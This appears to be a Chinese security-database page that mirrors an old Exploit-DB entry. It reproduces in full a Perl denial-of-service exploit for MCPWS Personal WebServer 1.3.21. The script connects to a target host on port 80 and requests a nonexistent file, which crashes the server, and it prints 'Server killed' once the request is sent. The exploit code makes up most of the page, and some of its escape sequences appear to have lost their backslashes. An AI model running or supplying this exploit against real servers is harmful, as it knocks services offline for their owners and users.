MCPWS Personal WebServer 1.3.21 – Denial of Service

MCPWS Personal WebServer 1.3.21 – Denial of Service

漏洞ID 1054972 漏洞类型
发布时间 2005-03-21 更新时间 2005-03-21
图片[1]-MCPWS Personal WebServer 1.3.21 – Denial of Service-安全小百科CVE编号 N/A
图片[2]-MCPWS Personal WebServer 1.3.21 – Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/891
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl

#  MCPWS Personal - Webserver <= 1.3.21 DoS Exploit
#  Vendor: http://www.mcpsoftware.de
#
#  The coder used a unsecure VB-function (Open) to open requested files
#  and didn't include a working error handling (On Error Goto etc).
#  It's possible to exploit this vulnerability by requesting files
#  that don't exist. Successful exploitation results 
#  in a runtime error that stops the process.
#
#  Nico Spicher [http://triplex.it-helpnet.de/]

use IO::Socket;

if (@ARGV < 1)
 {
system "clear";
print "[-] MCPWS Personal-Web Server <= 1.3.21 DoS Exploitnn";
print "[-] Usage: dos_mcpws.pl <host ip>n";
exit(1);
 }
system "clear";

$server = $ARGV[0];
system "clear";
print "[-] MCPWS Personal-Web Server <= 1.3.21 DoS Exploitnn";
print "[-] Server IP: ";
print $server;
print "n[-] Connecting to IP ...n";

$socket = IO::Socket::INET->new(
	Proto => "tcp",
	PeerAddr => "$server",
	PeerPort => "80"); unless ($socket) { die "[-] $server is offlinen" }

print "[-] Connectednn";

print "[-] Creating stringn";

  $string="ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 
# This file shouldn't exist :)

print "[-] Sending stringnn";

print $socket "GET /".$string." HTTP/1.1rnrn";

print "[>] Attack successful - Server killedn";
close($socket);

# milw0rm.com [2005-03-21]

相关推荐: Xerox Document Centre ESS Remote Buffer Overflow Vulnerability

Xerox Document Centre ESS Remote Buffer Overflow Vulnerability 漏洞ID 1098272 漏洞类型 Boundary Condition Error 发布时间 2004-06-23 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享